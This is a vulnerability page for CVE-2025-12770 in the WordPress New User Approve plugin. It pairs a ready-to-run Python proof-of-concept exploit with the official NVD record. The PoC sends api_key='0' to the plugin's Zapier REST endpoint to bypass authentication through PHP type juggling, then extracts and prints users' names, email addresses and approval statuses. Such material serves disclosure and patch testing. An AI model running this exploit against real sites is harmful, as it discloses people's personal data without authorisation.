CVE-2025-12770

import requests import json # CVE-2025-12770 PoC # New User Approve Plugin - API Key Validation Bypass # Affects: New User Approve <= 3.0.9 target_url = "http://target-wordpress-site.com" # Step 1: Identify Zapier REST API endpoint api_endpoint = f"{target_url}/wp-json/new-user-approve/v1/users" # Step 2: Exploit the type juggling vulnerability # Send api_key="0" to bypass authentication payload = { "api_key": "0" } print("[*] Attempting to exploit CVE-2025-12770...") print(f"[*] Target: {api_endpoint}") try: # Make request with api_key="0" response = requests.get(api_endpoint, params=payload, timeout=10) print(f"[*] Status Code: {response.status_code}") if response.status_code == 200: data = response.json() print("[+] SUCCESS! Authentication bypassed!") print("[+] Retrieved user data:") print(json.dumps(data, indent=2)) # Extract PII information if isinstance(data, list): for user in data: if isinstance(user, dict): username = user.get('user_login', user.get('username', 'N/A')) email = user.get('user_email', user.get('email', 'N/A')) status = user.get('status', 'N/A') print(f" - Username: {username}, Email: {email}, Status: {status}") else: print(f"[-] Failed. Status: {response.status_code}") print(f"[-] Response: {response.text[:200]}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") print("\n[*] Note: This PoC only works on sites where Zapier API key is not configured.")

{"cve": {"id": "CVE-2025-12770", "sourceIdentifier": "[email protected]", "published": "2025-11-19T04:16:04.920", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The New User Approve plugin for WordPress is vulnerable to unauthorized data disclosure in all versions up to, and including, 3.0.9 due to insufficient API key validation using loose equality comparison. This makes it possible for unauthenticated attackers to retrieve personally identifiable information (PII), including usernames and email addresses of users with various approval statuses via the Zapier REST API endpoints, by exploiting PHP type juggling with the api_key parameter set to \"0\" on sites where the Zapier API key has not been configured."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/new-user-approve/tags/3.0.9/includes/zapier/includes/rest-api.php#L104", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/new-user-approve/tags/3.0.9/includes/zapier/includes/rest-api.php#L40", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/new-user-approve/trunk/includes/zapier/includes/rest-api.php#L104", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3f1cf77a-64b4-405b-adcb-ef16d9e82ab2?source=cve", "source": "[email protected]"}]}}